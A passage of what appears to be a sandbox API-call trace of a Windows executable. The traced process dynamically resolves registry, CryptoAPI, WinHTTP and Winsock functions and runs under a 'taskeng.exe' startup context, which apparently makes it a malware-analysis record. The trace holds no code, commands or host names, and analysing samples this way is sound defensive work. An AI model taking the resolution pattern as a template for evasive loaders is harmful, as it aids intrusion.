ProcedureAddress=0x2001d*=0x77b42dd0) returned 0x0 [0241.289] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.289] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.291] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetVolumeInformationW", Ordinal=0x0, ProcedureAddress=0x20026 | out: ProcedureAddress=0x20026*=0x77b42150) returned 0x0 [0241.291] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.291] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.293] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetWindowsDirectoryW", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77b282b0) returned 0x0 [0241.293] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.293] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.294] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77b41bb0) returned 0x0 [0241.294] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.294] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.297] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b37070) returned 0x0 [0241.297] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.297] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.299] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x77b33ec0) returned 0x0 [0241.299] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.299] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.301] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetFullPathNameW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b376e0) returned 0x0 [0241.301] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.301] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.303] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0x2001e | out: ProcedureAddress=0x2001e*=0x77b43540) returned 0x0 [0241.303] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.303] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.304] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x77a20000) returned 0x0 [0241.316] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.316] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.318] LdrGetProcedureAddress (in: BaseAddress=0x77a20000, Name="wsprintfW", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77a4099c) returned 0x0 [0241.318] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.318] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.320] LdrGetProcedureAddress (in: BaseAddress=0x77a20000, Name="wsprintfA", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77a9bae8) returned 0x0 [0241.320] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.320] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.321] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x7feff0e0000) returned 0x0 [0241.323] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.323] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.325] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegQueryValueExW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff0fc2d0) returned 0x0 [0241.325] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.325] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.327] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegOpenKeyW", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff0f3280) returned 0x0 [0241.327] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.327] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.329] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegSetValueExW", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff0f1ed0) returned 0x0 [0241.329] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.329] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.331] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptDecrypt", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff11b6d0) returned 0x0 [0241.331] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.331] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.332] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptSetKeyParam", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff11b508) returned 0x0 [0241.332] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.333] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.334] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptDestroyKey", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7feff0eafa0) returned 0x0 [0241.334] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.334] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.338] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptEncrypt", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff11b650) returned 0x0 [0241.338] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.338] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.340] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptImportKey", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff0eaf6c) returned 0x0 [0241.340] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.340] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.343] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptAcquireContextA", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7feff0e8180) returned 0x0 [0241.343] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.343] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.345] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="CryptReleaseContext", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x7feff0edd10) returned 0x0 [0241.345] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.345] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.348] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegCreateKeyExW", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7feff0fb520) returned 0x0 [0241.348] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.348] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.349] LdrGetProcedureAddress (in: BaseAddress=0x7feff0e0000, Name="RegCloseKey", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff100710) returned 0x0 [0241.349] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.350] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.351] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fefdfd0000) returned 0x0 [0241.355] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.355] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.356] LdrGetProcedureAddress (in: BaseAddress=0x7fefdfd0000, Name="SHGetFolderPathW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7fefe053ba4) returned 0x0 [0241.357] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.357] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.358] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x20023 | out: BaseAddress=0x20023*=0x7feffa40000) returned 0x0 [0241.361] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.361] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.362] LdrGetProcedureAddress (in: BaseAddress=0x7feffa40000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feffa62a30) returned 0x0 [0241.363] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.363] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.364] LdrGetProcedureAddress (in: BaseAddress=0x7feffa40000, Name="CoInitializeSecurity", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7feffa58220) returned 0x0 [0241.364] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.364] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.366] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x7feffd80000) returned 0x0 [0241.368] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.368] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.369] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x2, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd83480) returned 0x0 [0241.369] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.369] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.371] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x6, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81320) returned 0x0 [0241.371] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.371] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.372] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x8, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd813f0) returned 0x0 [0241.372] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.372] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.374] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x9, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81180) returned 0x0 [0241.374] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.374] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.376] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x4, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81040) returned 0x0 [0241.376] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.376] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.378] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fefddf0000) returned 0x0 [0241.381] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.381] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.382] LdrGetProcedureAddress (in: BaseAddress=0x7fefddf0000, Name="CryptStringToBinaryA", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7fefde3e59c) returned 0x0 [0241.383] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.383] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.384] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fef7200000) returned 0x0 [0241.387] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.387] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.388] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpQueryHeaders", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x7fef720c4ac) returned 0x0 [0241.389] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.389] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.390] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpCloseHandle", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72022e0) returned 0x0 [0241.390] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.391] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.392] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpQueryDataAvailable", Ordinal=0x0, ProcedureAddress=0x2002a | out: ProcedureAddress=0x2002a*=0x7fef721dcfc) returned 0x0 [0241.392] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.392] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.394] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpOpen", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7fef7203428) returned 0x0 [0241.394] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.394] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.396] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpReceiveResponse", Ordinal=0x0, ProcedureAddress=0x20027 | out: ProcedureAddress=0x20027*=0x7fef720d068) returned 0x0 [0241.396] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.396] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.398] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSendRequest", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72074d0) returned 0x0 [0241.398] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.398] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.400] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSetOption", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7fef72039c4) returned 0x0 [0241.400] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.400] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.402] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpOpenRequest", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72045f8) returned 0x0 [0241.402] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.402] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.404] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSetTimeouts", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef720ec64) returned 0x0 [0241.404] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.404] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.406] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpConnect", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7fef7213e3c) returned 0x0 [0241.406] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.406] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.407] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpReadData", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7fef720e1e0) returned 0x0 [0241.407] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.407] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.409] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpCrackUrl", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7fef720ba38) returned 0x0 [0241.409] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.409] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.411] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x7fefee30000) returned 0x0 [0241.413] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.413] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.414] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x74, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee34cc0) returned 0x0 [0241.414] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.414] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.416] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name="getaddrinfo", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7fefee32720) returned 0x0 [0241.416] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.416] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.418] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name="freeaddrinfo", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7fefee32640) returned 0x0 [0241.418] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.418] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.420] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x39, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3ae20) returned 0x0 [0241.420] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.420] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.421] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x9, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee31250) returned 0x0 [0241.421] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.421] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.423] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x8, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3e270) returned 0x0 [0241.423] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.423] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.425] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0xc, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3d9a0) returned 0x0 [0241.425] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.425] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.426] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x5, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee5e450) returned 0x0 [0241.426] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.426] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.428] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x13, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee38000) returned 0x0 [0241.428] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.428] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.430] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x3, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee318e0) returned 0x0 [0241.430] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.430] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.432] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x17, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3de90) returned 0x0 [0241.432] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.432] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.433] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x10, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3df40) returned 0x0 [0241.433] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.433] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.435] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x15, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3dd30) returned 0x0 [0241.435] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.435] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.438] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0xb, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee31350) returned 0x0 [0241.438] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.438] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.440] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x4, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee345c0) returned 0x0 [0241.440] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.440] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.442] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x73, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee34980) returned 0x0 [0241.442] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.442] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.445] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x1ef800) returned 0x102 [0241.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef770 | out: lpSystemTimeAsFileTime=0x1ef770*(dwLowDateTime=0x2cab8680, dwHighDateTime=0x1d48db3)) [0241.445] GetCurrentProcessId () returned 0x9b4 [0241.445] GetCurrentThreadId () returned 0x97c [0241.445] GetTickCount () returned 0x4648c [0241.445] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef778 | out: lpPerformanceCount=0x1ef778*=1830906900000) returned 1 [0241.445] GetStartupInfoW (in: lpStartupInfo=0x1ef720 | out: lpStartupInfo=0x1ef720*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d48db32cab8680, hStdOutput=0x1aa4a8e2e20, hStdError=0xe0000)) [0241.445] GetModuleHandleW (lpModuleName=0x0) returned 0x140000000 [0241.445] __set_app_type (_Type=0x2) [0241.445] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140029698) returned 0x0 [0241.445] __wgetmainargs (in: _Argc=0x140033508, _Argv=0x140033518, _Env=0x140033510, _DoWildCard=0, _StartInfo=0x140033524 | out: _Argc=0x140033508, _Argv=0x140033518, _Env=0x140033510) returned 0 [0241.446] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77b20000 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="CreateThread") returned 0x77b36580 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="GetComputerNameW") returned 0x77b2d130 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpW") returned 0x77b3d9c0 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="lstrlenW") returned 0x77b33ec0 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="GetFullPathNameW") returned 0x77b376e0 [0241.446] GetProcAddress (hModule=0x77b20000, lpProcName="FindFirstFileW") returned 0x77b3bd80 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="FindResourceW") returned 0x77b39b50 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="FreeLibrary") returned 0x77b36620 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="LoadResource") returned 0x77b398c0 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleHandleW") returned 0x77b43730 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="SetFileTime") returned 0x77b33880 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcpynW") returned 0x77b6bab0 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="GetLastError") returned 0x77b42dd0 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="FindClose") returned 0x77b3bd60 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="LockResource") returned 0x77b28720 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="GetSystemInfo") returned 0x77b36f70 [0241.447] GetProcAddress 